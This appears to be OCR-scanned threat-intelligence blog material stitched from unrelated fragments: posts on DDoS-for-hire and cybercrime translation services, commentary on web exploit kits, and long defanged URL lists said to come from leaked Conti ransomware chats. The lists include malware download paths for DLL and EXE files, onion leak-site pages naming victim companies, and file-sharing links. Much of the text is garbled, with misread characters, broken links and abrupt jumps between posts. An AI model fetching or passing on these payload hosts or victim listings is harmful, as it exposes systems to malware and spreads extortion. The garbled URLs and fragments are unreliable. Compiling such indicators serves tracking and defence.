what could easily turn into a coordinated insider attack requested by a third-party. Moreover, 
now that I’ve also established the connection between this DDoS for hire service and one of 
the command and control locations (all active and online) of one of the botnets used in the 
[3]Russia vs Georgia cyberattack, the [4]concept of engineering cyber warfare tensions once 
again proves to be [5]a fully realistic one. 


Related posts: 
[6]A U.S military botnet in the works 
[7]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks 
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The following are all of the publicly accessible URLs obtained using public sources from the 
leaked internal communication of the Conti ransomware gang. 


hxxp://109[.]230[.]199[.]73/209[. ]dll 

hxxp://109[.]230[.]199[.]73/209x64[.Jexe 

hxxp://109[.]230[.]199[.]73/k[.]dll 

hxxp://109[.]230[.]199[.]73/k[.]Jexe 

hxxp://14740-27223[.]bacloud[.]info/webmail/ 
hxxp://188[.]241[.]120[.]42/wail.]php 

hxxp://195[.]149[.]87[.]59/1 http x64[.]dll 

hxxp://195[.]149[.]87[.]59/2 https x64. ]dll 

hxxp://195[.]149[.]87[.]59/bec http 111 x64-1638187035-T12B123Z 64-cr[.]dll 
hxxp://195[.]149[.]87[.]59/bec http 111 x64-1638187173-T0B123Z 64-cr[.]exe 
hxxp://195[.]149[.]87[.]59/bec http 111 x86-1638187295-T12B123Z 32-cr[.]dll 
hxxp://195[.]149[.]87[.]59/bec http 111 x86-1638187422-T0B123Z 32-cr[.]exe 
hxxp://195[.]149[.]87[.]59/bec http 555 x64-1638187557-T12B123Z _64-cr[.]dll 
hxxp://195[.]149[.]87[.]59/bec http 555 x64-1638187720-TOB23Z 64-cr[.Jexe 
hxxp://195[.]149[.]87[.]59/bec http 555 x86-1638187809-T12B123Z 32-cr[.]dll 
hxxp://195[.]149[.]87[.]59/bec http 555 x86-1638187956-TOB23Z 32-cr[.Jexe 
hxxp://198[.]244[.]193[.]210/images/wolf[.]png 
hxxp://199[.]233[.]235[.]194/518e04ba-3342-4b8c-9c11-93e2f4afb818 /pem/ 


hxxp://199[.]233[.]235[.]194/518e04ba-3342-4b8c-9c11-93e2f4afb818 /pem/Budgets/Budget 
20-21/BUDGET MESSAGE 2020-2021[.]pdf 


hxxp://203[.]80[.]170[.]81 


hxxp://22q6iu4dmoex3xv5vdiceqzc2bkrc6262cak5ylp3vwauqw3zaxpuyad[.]Jonion 
/zeh7dkwfdxw99tdk/ 


hxxp://31[.]14 
hxxp://37[.]O[.]8[.]166 


hxxp://4nmxrhdtbznfr7f3q6bhd4qxxfcxodao3h2txugojsizca4uhppdkzad[.Jonion /private/168- 
xavj5/M5kuzP _sampleDatal[.]jpg 


hxxp://63[.]147[.]234[.]198 
hxxp://SVL[.]COM 
hxxp://aicode-test[. Jart/lIfnw/bftzVKMok5)JwF44/ 
hxxp://airsofthoekje[.]nl/wp-admin/C1YLQ7Q23YM/ 
hxxp://bergmeitli[.]ch/2[.]dll 
hxxp://boncointunisie[.]com/iboct/HaatTz7 HREgoFZIN/ 
hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[ .]onion/ 
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hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad[. ]onion/4 
_Minto Group 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/6 
_DEWEtech 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/9 
_TRI-COUNTY _ELECTRIC COOPERATIVE _INC 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/9 
_RLD Associates 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[. onion 
LAVI 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad[.]onion/P 
_Financial Horizons Group 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/Q 
_Harness _IP 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/S 
_BSCR 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad[.]onion/S 
_BSCR 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/X 
_KISTERS 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad[.]onion/b 
_Spencer Gifts LLC 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/b 
_Spencer Gifts LLC 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[. ]onion/f 
_Hutt 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]lonion/g 
_Shutterfly _Inc 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[.]onion/g 
ENG 


hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad[. Jonion/i 
_FRONTIER _SOFTWARE 
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hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad[. ]onion/z 
_Acuity _Brands 


hxxp://contirec7nchr45rx6ympez5rjldibnqzh7|lsa56lvjvaeywhvoj3wad[.lonion/N 
9nz4fcgefhEliAcajtSgi4ENLEriHum6l1ZgTB30pPWhRg8KRr]JYjxiLdSOrk 


hxxp://contirec7nchr45rx6ympez5rjldibnqzh7|sa56lvjvaeywhvoj3wad[. lonion 
/NJv9nz4fcgefhEliAcajtSgi4ENLEriHum6l1ZgTB30pPWhRg8KRrJYjxiLdSOrk 


hxxp://contirec7nchr45rx6ympez5rjldibnqzh7lsa56lvjvaeywhvoj3wad[.]onion 
/vOjdyhnt7ADeB867Pg5elANOWX40k3KndyNiyaRB1mwPOKMtHLnPeuVSj99huNzu 
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hxxp://contirecj4hbzmyzuydyzrvm2c65bImvhoj2cvf25zqj2dwrrqcq5oad[.]onion/ 
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It’s where you advertise your services, and how you position yourself that speak for your 
intentions, of course, "between the lines". There’s a common misunderstanding that in order 
for a malware campaigner or scammer to launch a localized attack speaking the native 
language of their potential victims, they need to speak the local language. This misconception 
is largely based on the fact that a huge number of people remain unaware on how core 
strategic business practices have been in operation across the cybercrime underground for 
the last couple of years. 


[1]Outsourcing the localization process (translation services for spam/phishing/malware 
Campaigns) has been happening for a while, courtsy of DIY servics ensuring complete 
anonymity of their customers. Interestingly, the translators may in fact be unaware that the 
advertising channels the service is using is directly attracting everyone from the bottom to 
the top of the cybercriminal food chain as a customer. Sometimes, it’s services like this that 
open a new market segment covering an untapped opportunity, with this particular service 
already pointing out that it’s charging cheaper than their competitors. 


"We offer our services in translation. We are only competent translators profile higher 
education. Service is working with all types of texts. Languages available at this time of 
Russian, English, German. Average translation of the text takes up to 10 hours (usually much 
faster) through the full automation of the order and payment. Just want to note that we do 
not keep any logs on IP and does not require registration. In addition you can remove 
your order from the database after his execution. In addition to running more than 1000 
translations already, we can usé all the lessons learned to be more effective in our services. 
Prices vary depending on the complexity of the topic covered. 
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hxxp://privnote[.]com/wTX3RYFy 
hxxp://privnote[.]com/wbfGCALc 
hxxp://privnote[.]com/weKK8tpm 
hxxp://privnote[.]com/wkg8ISoB 
hxxp://privnote[.]com/wmNf5HLr 
hxxp://privnote[.]com/wwfL5hqi 
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hxxp://privnote[.]com/x6uy4mqx 
hxxp://privnote[.]com/xoZIMnt7 
hxxp://privnote[.]com/yOznOayo 
hxxp://privnote[.]com/zPszWGs8 
hxxp://prnt[.]sc/LOni7xz 

hxxp://prnt[.]sc/11cdg8c 

hxxp://prnt[.]Jsc/L1h4w3v 

hxxp://prnt[.]sc/11h4zwh 

hxxp://prnt[.]sc/11h58ex 

hxxp://prnt[.]sc/11h59lg 

hxxp://prnt[.]sc/11h5bqx 

hxxp://prnt[.]sc/16x133m 

hxxp://prnt[.]sc/180yOu9 

hxxp://prnt[.]sc/180y5tl 

hxxp://prnt[.]sc/180y8stl 

hxxp://prnt[.]sc/Lb5gj8} 

hxxp://prnt[.]sc/Lri6dev 

hxxp://prnt[.]sc/26xz312 

hxxp://prnt[.]sc/wh26pt 

hxxp://prnt[.]sc/wh26qd 

hxxp://prnt[.]sc/wh26rb 

hxxp://protonmail[.]com/abuse 
hxxp://protransport[.]cloud[.]com/citrix/storeweb/ 
hxxp://qaz[.Jim/index[.]php?a=delete &q=100837669 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1017772637 
hxxp://qaz[.]im/index[.]php?a=delete &q=1019493937 
hxxp://qaz[.]im/index[.]php?a=delete &q=1027630981 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1037509244 
hxxp://qaz[.]im/index[.]php?a=delete &q=1061652032 
hxxp://qaz[.]im/index[.]php?a=delete &q=1070233779 
hxxp://qaz[.]im/index[.]php?a=delete &q=1070249902 
hxxp://qaz[.]im/index[.]php?a=delete &q=1080184932 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1109292991 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1115117535 
hxxp://qaz[.]im/index[.]php?a=delete &q=111661878 
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hxxp://qaz[.]im/index[.]php?a=delete &q=11201682 
hxxp://qaz[.]im/index[.]php?a=delete &q=114525952 
hxxp://qaz[.]im/index[.]php?a=delete &q=1171011028 
hxxp://qaz[.]im/index[.]php?a=delete &q=1179791491 
hxxp://qaz[.]im/index[.]php?a=delete &q=1203049531 
hxxp://qaz[.]im/index[.]php?a=delete &q=1215480185 
hxxp://qaz[.]im/index[.]php?a=delete &q=1224990473 
hxxp://qaz[.]im/index[.]php?a=delete &q=1233836586 
hxxp://qaz[.]im/index[.]php?a=delete &q=12365457 
hxxp://qaz[.]im/index[.]php?a=delete &q=1307407019 
hxxp://qaz[.]im/index[.]php?a=delete &q=132900450 
hxxp://qaz[.]im/index[.]php?a=delete &q=1356373434 
hxxp://qaz[.]im/index[.]php?a=delete &q=1356645287 
hxxp://qaz[.]im/index[.]php?a=delete &q=1359541035 
hxxp://qaz[.]im/index[.]php?a=delete &q=1366717855 
hxxp://qaz[.]im/index[.]php?a=delete &q=1369014921 
hxxp://qaz[.]im/index[.]php?a=delete &q=1381740926 
hxxp://qaz[.]im/index[.]php?a=delete &q=1411051775 
hxxp://qaz[.]im/index[.]php?a=delete &q=1420522617 
hxxp://qaz[.]im/index[.]php?a=delete &q=1446105628 
hxxp://qaz[.]im/index[.]php?a=delete &q=1547357124 
hxxp://qaz[.]im/index[.]php?a=delete &q=1577956610 
hxxp://qaz[.]im/index[.]php?a=delete &q=1623605181 
hxxp://qaz[.]im/index[.]php?a=delete &q=1657408961 
hxxp://qaz[.]im/index[.]php?a=delete &q=1662928809 
hxxp://qaz[.]im/index[.]php?a=delete &g=1665950173 
hxxp://qaz[.]im/index[.]php?a=delete &q=1686159757 
hxxp://qaz[.]im/index[.]php?a=delete &q=1686375644 
hxxp://qaz[.]im/index[.]php?a=delete &q=1698993279 
hxxp://qaz[.]im/index[.]php?a=delete &q=1741258151 
hxxp://qaz[.]im/index[.]php?a=delete &q=1788776207 
hxxp://qaz[.]im/index[.]php?a=delete &q=1830434018 
hxxp://qaz[.]im/index[.]php?a=delete &q=1926224143 
hxxp://qaz[.]im/index[.]php?a=delete &q=1945296066 
hxxp://qaz[.]im/index[.]php?a=delete &q=1965148773 
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Prices and deadlines: 

Standard - the deadline is not more than 24 hours. Prices depend on the direction and 
guidance from the ‘Order’. 

* Term - work on your translation begins precedence. The price of the 50 % more than the 
standard translation. Prices also depend on the direction and guidance from the ‘Order’. 


The cost of the transfer depends on the amount of work. The workload is measured in 
symbols. In calculating the characters are shown letters and numbers. Punctuation do not 
count. Minimum order 100 characters." 


I’m particularly curious how is a contractor(translator) going to react to a situation when 
a large scale malware campaign speaking several different languages tell a fake story that the 
contractor might have recently translated for them. With the employer positioning itself as a 
fully legitimate company, whereas its customers requesting localized version of texts for the 
spam/phishing/malware campaigns are the "usual suspects", the contractors would continue 
allowing cybercriminals the opportunity to build more authenticity within their campaigns. 


Related posts: 

[2]E-crime and Socioeconomic Factors 

[3]MPack and IcePack Localized to Chinese 

[4]The Icepack Exploitation Kit Localized to French 
[5]The FirePack Exploitation Kit Localized to Chinese 
[6]Localizing Open Source Malware 

[7]Localized Fake Security Software 

[8]A Localized Bankers Malware Campaign 

[9]Lonely Polina’s Secret (Localized malware campaign) 


. http: //ddanchev. blogspot .com/2008/02/localizing-cybercrime-cultural.htm 
. http: //ddanchev. blogspot .com/2008/01/e-crime-and-socioeconomic-factors.htm 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


http: //ddanchev. blogspot .com/2008/05/icepack-exploitation-kit-localized-to.htm 


ttp://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


_http://adanchev blogspot .con/2007/09/local:izing- open source-nalare. nt 
| http://adanchey blogspot .con/2008/04/tocal ized~fake-security-softvare. hin 

_ het: //Adanchev blogspot. con/2008/03/ local ized-bankers-nalvare- campaign. ital 
| http://adanchev blogspot. con/2007/11/lonely-polinas- secret htall 
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hxxp://qaz[.Jim/index[.]php?a=delete &q=2003667918 
hxxp://qaz[.]im/index[.]php?a=delete &q=2011930910 
hxxp://qaz[.Jim/index[.]php?a=delete &q=202353530 
hxxp://qaz[.]im/index[.]php?a=delete &q=2044017498 
hxxp://qaz[.]im/index[.]php?a=delete &q=208643753 
hxxp://qaz[.]im/index[.]php?a=delete &q=22348163 
hxxp://qaz[.]im/index[.]php?a=delete &q=227698087 
hxxp://qaz[.]im/index[.]php?a=delete &q=239881245 
hxxp://qaz[.Jim/index[.]php?a=delete &q=277373299 
hxxp://qaz[.]im/index[.]php?a=delete &q=289066041 
hxxp://qaz[.]im/index[.]php?a=delete &q=332470942 
hxxp://qaz[.]im/index[.]php?a=delete &q=396527771 
hxxp://qaz[.]im/index[.]php?a=delete &q=425150895 
hxxp://qaz[.Jim/index[.]php?a=delete &q=427416259 
hxxp://qaz[.]im/index[.]php?a=delete &q=44232297 
hxxp://qaz[.]im/index[.]php?a=delete &q=47502363 
hxxp://qaz[.Jim/index[.]php?a=delete &q=481387798 
hxxp://qaz[.Jim/index[.]php?a=delete &q=511878670 
hxxp://qaz[.]im/index[.]php?a=delete &q=52884817 
hxxp://qaz[.Jim/index[.]php?a=delete &q=536820566 
hxxp://qaz[.]im/index[.]php?a=delete &q=568482112 
hxxp://qaz[.]im/index[.]php?a=delete &q=570982321 
hxxp://qaz[.]im/index[.]php?a=delete &q=576322611 
hxxp://qaz[.]im/index[.]php?a=delete &q=594088065 
hxxp://qaz[.]im/index[.]php?a=delete &q=634558826 
hxxp://qaz[.]im/index[.]php?a=delete &q=673089446 
hxxp://qaz[.]im/index[.]php?a=delete &q=688117064 
hxxp://qaz[.Jim/index[.]php?a=delete &q=700519506 
hxxp://qaz[.]im/index[.]php?a=delete &q=721279833 
hxxp://qaz[.Jim/index[.]php?a=delete &q=723168418 
hxxp://qaz[.]im/index[.]php?a=delete &q=754999226 
hxxp://qaz[.]im/index[.]php?a=delete &q=759090281 
hxxp://qaz[.Jim/index[.]php?a=delete &q=814375800 
hxxp://qaz[.]im/index[.]php?a=delete &q=853729422 
hxxp://qaz[.Jim/index[.]php?a=delete &q=885003386 


20173 


hxxp://qaz[.]im/index[.]php?a=delete &q=88631139 
hxxp://qaz[.]im/index[.]php?a=delete &q=906821117 
hxxp://qaz[.]im/index[.]php?a=delete &q=945582404 
hxxp://qaz[.]im/index[.]php?a=delete &g=966427475 
hxxp://qaz[.]im/index[.]php?a=delete &q=966698674 
hxxp://qaz[.]im/index[.]php?a=delete &q=977306735 
hxxp://qaz[.]im/index[.]php?a=delete &q=981658134 
hxxp://qaz[.]im/index[.]php?a=delete &q=990625372 
hxxp://qaz[.]im/index[.]php?a=delete &q=997786446 
hxxp://qaz[.]im/load/378ZBK/3B6Sy3 
hxxp://qaz[.]im/load/3EZGA7/4SEstA 

hxxp://qaz[. ]im/load/3KnBYr/YH6bHi 
hxxp://qaz[.]lim/load/43HBQ2/ysa46b 
hxxp://qaz[.]im/load/49QiGQ/7bdNe6 
hxxp://qaz[.]im/load/4htAfZ/6n5i4d 
hxxp://qaz[.]im/load/57dB3z/6ATR73 
hxxp://qaz[.]im/load/5BSrKa/BerT4r 
hxxp://qaz[.]im/load/5Shkah/nEteeR 
hxxp://qaz[.]im/load/5kBAsb/8fQ8Az 
hxxp://qaz[.]im/load/6nESHd/eHF97t 
hxxp://qaz[.]lim/load/6zQd9F/Qf4yns 
hxxp://qaz[.]im/load/7FD2fG/8Z28Gd 
hxxp://qaz[.]lim/load/7 GkTEn/kdk23y 
hxxp://qaz[.]im/load/83bhNB/etFHD6 
hxxp://qaz[.]im/load/86r9nr/Y453E6 
hxxp://qaz[.]im/load/8T7ARr/zr9zZ3 
hxxp://qaz[.]im/load/996yS9/b8TeTd 

hxxp://qaz[. ]im/load/9GSdfE/seFS67 
hxxp://qaz[.]im/load/B6zbZH/bHS9RD 
hxxp://qaz[.]im/load/DDHFK6/nHtkBB 
hxxp://qaz[.]im/load/DiHdT8/SG5BHB 
hxxp://qaz[.]im/load/E29Etk/f37ab8 
hxxp://qaz[.]im/load/EQEFQT/dsGttkK 
hxxp://qaz[.]im/load/ESY23i/TK9zbB 
hxxp://qaz[.]im/load/EoBDth/DakKf8Q 
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hxxp://qaz[.Jim/load/FF4ETQ/B6Br5S 
hxxp://qaz[.]im/load/FYieQR/esGfAb 
hxxp://qaz[.]im/load/G76EKe/SFBAdZ 
hxxp://qaz[.Jim/load/GH22y6/BAYSTY 
hxxp://qaz[.]im/load/GnDn7a/z92dry 
hxxp://qaz[.]im/load/GtRayt/68QTyF 
hxxp://qaz[.]im/load/Gy53HN/k5r2Nb 
hxxp://qaz[.]im/load/H432D9/bBna5d 
hxxp://qaz[.]Jim/load/HFsTyy/bDhia9 
hxxp://qaz[.]im/load/HiEfzY/4B2F8f 
hxxp://qaz[.]Jim/load/HrtE5y/bZfH8K 
hxxp://qaz[.]im/load/K4nK2Z/4HBNdQ 
hxxp://qaz[.]im/load/K5RfkB/rbD69a 
hxxp://qaz[.Jim/load/KyZ2Zn/Z3dkZh 
hxxp://qaz[.]im/load/N4KaQF/2YiQSa 
hxxp://qaz[.]im/load/N8GHfA/G8eGRH 
hxxp://qaz[.]im/load/QYn2Y2/2t28ef 
hxxp://qaz[.]Jim/load/Qythah/Z4nBsS 
hxxp://qaz[.]im/load/SFAsZf/YyKDda 
hxxp://qaz[.]Jim/load/STFhsK/SN8dha 
hxxp://qaz[.]Jim/load/SY46iS/FraQ7t 
hxxp://qaz[.Jim/load/SYhSZd/eAtsst 
hxxp://qaz[.]im/load/T3ZQ3H/8tTNdt 
hxxp://qaz[.Jim/load/TZFyRZ/8Y5ieh 
hxxp://qaz[.Jim/load/To6rNh/dYkYy2 
hxxp://qaz[.]im/load/YFGzyF/sAZZD6 
hxxp://qaz[.]im/load/YkEYee/eNtrYk 
hxxp://qaz[.]im/load/YshfBB/9BzF4e 
hxxp://qaz[.Jim/load/ZEzidA/ZSQriF 
hxxp://qaz[.Jim/load/ZYyR5G/AnrEzG 
hxxp://qaz[.]im/load/a4hNA6/6iRG4s 
hxxp://qaz[.]im/load/aKE2KN/3KDD33 
hxxp://qaz[.]Jim/load/aTsSbh/r54tHz 
hxxp://qaz[.Jim/load/azfH7k/Rrz4d2 
hxxp://qaz[.]im/load/bKZ6Fy/akDDrZ 
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hxxp://qaz[.]im/load/bbDNtD/RrQrRt 
hxxp://qaz[.]im/load/bh8ebt/RhSHdE 
hxxp://qaz[.]lim/load/dKn8kZ/TdsEhH 
hxxp://qaz[.]im/load/dYiZNa/Yb3FyR 
hxxp://qaz[.]im/load/db5faS/ZNtf7t 
hxxp://qaz[.]im/load/ddED4Q/E3rhQS 
hxxp://qaz[.]im/load/e6z76k/bB75bZ 
hxxp://qaz[.]im/load/eNaiQY/HSQSFs 
hxxp://qaz[.]im/load/edBZkE/BrYG9a 
hxxp://qaz[.]im/load/ef6s7D/shRDzn 
hxxp://qaz[.]im/load/fA9H3r/QRESNr 
hxxp://qaz[.]im/load/fHFr7D/Hbse82 
hxxp://qaz[.]im/load/fHGZTA/z2E7S5 
hxxp://qaz[. ]im/load/FRRNHe/Sri3Gn 
hxxp://qaz[.]lim/load/fTZhan/fGdDfE 
hxxp://qaz[.]im/load/fnHB9k/B74aDn 
hxxp://qaz[.]im/load/h9Sky2/78992f 
hxxp://qaz[.]lim/load/hAQ9aA/SyTeQ5 
hxxp://qaz[.]im/load/hzkQTQ/BTa6Ze 
hxxp://qaz[.]im/load/iT53GY/hHn6as 
hxxp://qaz[.]im/load/iTbA5H/FZStD4 
hxxp://qaz[.]im/load/iYeRe8/52tBae 
hxxp://qaz[.]im/load/ifkyDT/tfz6Yd 
hxxp://qaz[.]Jim/load/kBr8bK/8BiZFK 
hxxp://qaz[.]lim/load/n6BEKD/3iQ2n8 
hxxp://qaz[.]im/load/nE78n7/hG3Ehd 
hxxp://qaz[.]im/load/nTHkT9/DdrheS 
hxxp://qaz[.]im/load/nZh6K2/4nenD6 
hxxp://qaz[.]im/load/nndeF3/yNik9k 
hxxp://qaz[. ]im/load/nr8NH4/6bY2ek 
hxxp://qaz[.]im/load/r9ZerS/FKYn4Z 
hxxp://qaz[.]lim/load/rH6KQd/yHSK8s 
hxxp://qaz[.]lim/load/rh8Tze/KK74HA 
hxxp://qaz[.]im/load/rysdi2/9zadnN 
hxxp://qaz[.]lim/load/sBQRBS/tFG5EK 
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hxxp://qaz[.]im/load/sDK6Yd/2QrQ8s 
hxxp://qaz[.]im/load/sGNZZz/Sh2HnH 
hxxp://qaz[.]Jim/load/sTsiGF/5kRtRh 
hxxp://qaz[.]im/load/sYe45H/NZANK9 
hxxp://qaz[.]im/load/saRneF/KRZSeY 
hxxp://qaz[.]im/load/sb5n9T/tF9RDd 
hxxp://qaz[.]im/load/tHZ8d5/7zZ8kY9 
hxxp://qaz[.]Jim/load/tR37RF/8DQ5eb 
hxxp://qaz[.Jim/load/ttsDhY/bStQiE 
hxxp://qaz[.]im/load/y9fQHa/e5F 2t8 
hxxp://qaz[.]im/load/yrtSSt/d8zGrd 
hxxp://qaz[.Jim/load/ytzEZe/ZhiSN6 
hxxp://qaz[.Jim/load/ZB83hF/Q2zd7Q 
hxxp://qaz[.]im/load/zG4GAn/bz8te5 
hxxp://qaz[.]im/load/zGD8Y4/K7tA8f 
hxxp://qaz[.Jim/zaq/2ANyG55S 
hxxp://qaz[.]im/zaq/2serR58b 
hxxp://qaz[.]im/zaq/33iKryr6 
hxxp://qaz[.]Jim/zaq/4K34h2RB 
hxxp://qaz[.Jim/zaq/62aGKsQe 
hxxp://qaz[.]Jim/zaq/8AYGF3nD 
hxxp://qaz[.Jim/zaq/BN55hni6 
hxxp://qaz[.]Jim/zaq/Gd9fNySE 
hxxp://qaz[.]Jim/zaq/HNZeaBrb 
hxxp://qaz[.Jim/zaq/Kh2KE8et 
hxxp://qaz[.]im/zaq/Ki32Qb4d 
hxxp://qaz[.]im/zaq/SGahBGnN 
hxxp://qaz[.Jim/zaq/T4KE5zka 
hxxp://qaz[.Jim/zaq/T 7YQ3GaA 
hxxp://qaz[.]Jim/zaq/TS6tBDDN 
hxxp://qaz[.Jim/zaq/YbBf4ZyS 
hxxp://qazl[.Jim/zaq/b6S2G6b9 
hxxp://qaz[.Jim/zaq/e6nb5zH3 
hxxp://qaz[.Jim/zaq/eFKnRBt5 
hxxp://qaz[.Jim/zagq/fEN7innR 
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hxxp://qaz[.]im/zaq/h5E5rdiG 
hxxp://qaz[.]lim/zaq/iEe7S3Qz 
hxxp://qaz[.]im/zaq/iY2fr3y3 
hxxp://qaz[.]Jim/zaq/nNG8Edd4 
hxxp://qaz[.]Jim/zaq/rHdkiBYZ 
hxxp://qaz[.]im/zaq/reAA95KF 
hxxp://qaz[.]im/zaq/sNHrz8sY 
hxxp://qaz[.]lim/zaq/sYaQhaAR 
hxxp://qaz[.]Jim/zaq/sZK4hBk6 
hxxp://qaz[.]im/zaq/seYAh4S9 
hxxp://qaz[.]im/zaq/yN2ftRYN 
hxxp://qaz[.]im/zaq/yt25YTTQ 
hxxp://qaz[.]im/zaq/zDk4dkKzY 
hxxp://qaz[.]lim/zaq/zyGi6E99 


hxxp://rebatekey[.]com/?wickedsource=google &wickedid=EAlalQobChMIzO 
_ysuyy8QIVC462Ch3-YQ9JEAMYAyAAEgJMB _D _BwE Q&wickedid=488148698112 &wv=3[.]1 
&gclid=EAlalQobChMIzO _ysuyy8QIVC46z2Ch3-YQ9JEAMYAyAAEgJMB _D_BwE 


hxxp://referral-links[.]uk/topcashback-co-uk-referral-link/ 

hxxp://remote[. ]stockport[.]gov[.]uk/RDWeb/Pages/en-US/login[. Jaspx 
hxxp://rocketreach[.]co/topcashback-email-format _b5ca678ff42e0bfc 
hxxp://ru[.]wikipedia[.Jorg/wiki/Rust _ 
hxxp://securityintelligence[.]com/posts/trickbot-gang-doubles-down-enterp rise-infection/ 
hxxp://sellvip72[.]com/en/contact[.]php 
hxxp://send[.]exploit[.Jin/download/8bcac089623fcf96/ 
hxxp://send[.]Jexploit[.Jin/download/917da366e5ff1435/ 
hxxp://send[.]Jexploit[.Jin/download/acfda6d9a25cde75/ 
hxxp://sf-8326c07[.]hx[.]spiderfoot[.]net/ 

hxxp://shell[.]com/file[.]appinstaller 

hxxp://shell[.]com/file[.]Jappinstaller 

hxxp://shell[.]com/file[.]Jappinstaller &activationUri=custom-params 

hxxp://shell[. ]com/file[.]appxbundle 

hxxp://shell[. ]com/index[.]html 

hxxp://shell[. ]com/path/?dll 
hxxp://slingshotsforchrist[.]com/getfile[.]php?action=getlog 

hxxp://solana[.]com/ 

hxxp://srcdatastorage[.]z13[.]web[.]core[.]windows[.]net/ jajnedhneb[.]appinstaller 
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hxxp://srcdatastorage[.]z13[.]web[.]core[.]windows[.]net/ jajnedhneb[.Jappxbundle 


hxxp://srcdatastorage[.]z13[.]web[.]core[.]windows[.]net/ jajnedhn- 
eb[.Jappxbundle?param1=https 


hxxp://stackoverflow[.]com/questions/39453027/how-to-disable-http2-in-ngi nx 


hxxp://staffordshire-technology-park[.]cylex-uk[.]co[.Juk/company/t opcashback-ltd- 
26860465[.]html 


hxxp://teletype[.]in/ 
hxxp://temp[.]sh/FwsSg/1[.]rar 


hxxp://templ[.]Jsh/HXmZA/ %D0 %A1 %DO %BD %D0 %B8 %DO %BC %DO0 %BE %DO %BA %20 
%D1 %8D %DO %BA %D1 %80 %DO %BO %DO %BD %DO %BO %202022-02-19 %20 %DO %B2 
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You didn’t even think for a second that the supply of typosqutted domains serving packed and 
triple crypted to the point where the binary is not longer executing, fake security software 
domains is declining? With the upcoming holidays and the usual peak of web traffic, malicious 
activity on all fronts is prone to increase during December. YEWGATE LTD, Sawert Alliance, 
and Sagent Group, personal favorites affiliate participants in a revenue sharing program for 
serving fake security software, try to maintain a decent rhythm in their typosquatting pro- 
cess, always worth taking a peek at. The very latest rogue security software additions include : 
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Awesome! 


Based on the recently leaked internal communication of the infamous Russia based Conti ran- 
somware gang in this post I'll provide actionable intelligence on the Conti ransomware gang 
in-depth and discuss and offer practical actionable intelligence on their Internet connected in- 
frastructure in terms of providing Dark Web onion Web sites personal email address accounts 
IPS and command and control server IPs part of the gang’s vast and vibrant Internet connected 
infrastructure with the idea to assist the U.S Intelligence Community and U.S Law Enforcement 
on its way to track down and prosecute the cybercriminals behind these malicious and fraudu- 
lent ransomware campaigns. 


Conti ransomware gang’s primary Dark Web Onion XMPP: 
hxxp://q3mcco35auwcstmt.onion 


Sample screenshots of Conti ransomware gang’s Internet connected infrastructure: 
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Shipping them in batches means exposing them in batches. 
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4.12.1 Yet Another Web Malware Exploitation Kit in the Wild (2008-12-02 14:08) 
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With business-minded malicious attackers embracing basic marketing practices like branding, 
it is becoming increasingly harder, if not pointless to keep track of all XYZ-Packs currently in 
circulation. How come? Due to their open source nature allowing modifications, claiming copy- 
right over the modified and re-branded kit, the source code of core web malware exploitation 
kits continue representing the foundation source code for each and every newly released kit. 
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In fact, the practice is becoming so evident, that anecdotal evidence in the form of monitoring 
ongoing communications between sellers and buyers reveals actual attempts of intellectual 
property enforcement in the form of exchange of flames between an author of a original kit, 
and a newly born author who seems to have copied over 80 % of his source code, changed 
the layout, re-branded it, added several more exploits and started pitching it as the most 
exclusive kit there is available in the underground marketplace. 
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What’s new about this particular kit anyway? Changed iframe and js obfuscation techniques, 
doesn’t require MySQL to run, with several modified Adobe Acrobat and Flash exploits - all 
patched and publicly obtainable. This is precisely where the marketing pitch ends for the 
majority of malware kits released during the last quarter. 


As always, there are noticable exceptions to the common wisdom that time-to-underground 
market isn’t allowing them to innovate, but thankfully, these exceptions aren’t yet going 
mainstream. What is going to change in the upcoming 2009? Web malware exploitation kits 
are slowly maturing into multi-user cybercrime platforms, where traffic management coming 
from the SQL injected or malware embedded sites is automatically exploited with access to 
the infected hosts or to the traffic volume in general offered for sale under a flat rate, or ona 
volume basis. 


Converging traffic management with drive-by exploitation and offering the output for 
sale, all from a single web interface, is precisely what [1]malicious economies of scale is all 
about. 
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[6]Web Based Malware Emphasizes on Anti-Debugging Features 
[7]Copycat Web Malware Exploitation Kit Comes with Disclaimer 
[8]Web Based Malware Eradicates Rootkits and Competing Malware 
[9]Two Copycat Web Malware Exploitation Kits in the Wild 
[10]Copycat Web Malware Exploitation Kits are Faddish 

[11]Web Based Botnet Command and Control Kit 2.0 
